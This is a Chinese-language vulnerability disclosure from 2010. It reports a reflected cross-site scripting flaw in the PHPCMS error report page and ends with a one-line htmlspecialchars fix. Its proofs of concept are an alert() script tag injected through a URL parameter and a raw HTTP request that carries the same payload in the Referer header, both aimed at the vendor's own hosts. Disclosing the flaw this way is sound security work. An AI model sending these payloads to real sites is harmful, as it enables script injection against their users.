漏洞详情
披露状态:
2010-07-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-07-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
PHPCMS全系列某页面跨站脚本漏洞
详细说明:
PHPCMS全系列错误报告页面跨站脚本漏洞。
两种版本
1、官方demo页面为url xss.
2、官方主站的错误报告页面,$info['error_link']去自referer,更改referer即可插入任意代码。
危害不大,漏洞等级,低。
漏洞证明:
POC1:http://demo.phpcms.cn/error_report/error_report.php?title=1&contentid=1"><script>alert(/xss/)</script><"
POC2:
GET /error_report/error_report.php?title=1 HTTP/1.1
Host: www.phpcms.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=4ko75j2uund85mqgerk0fpup67
Referer: "><script>alert(/xss/)</script><"
修复方案:
error_report.php
$info['error_link'] = htmlspecialchars($info['error_link']);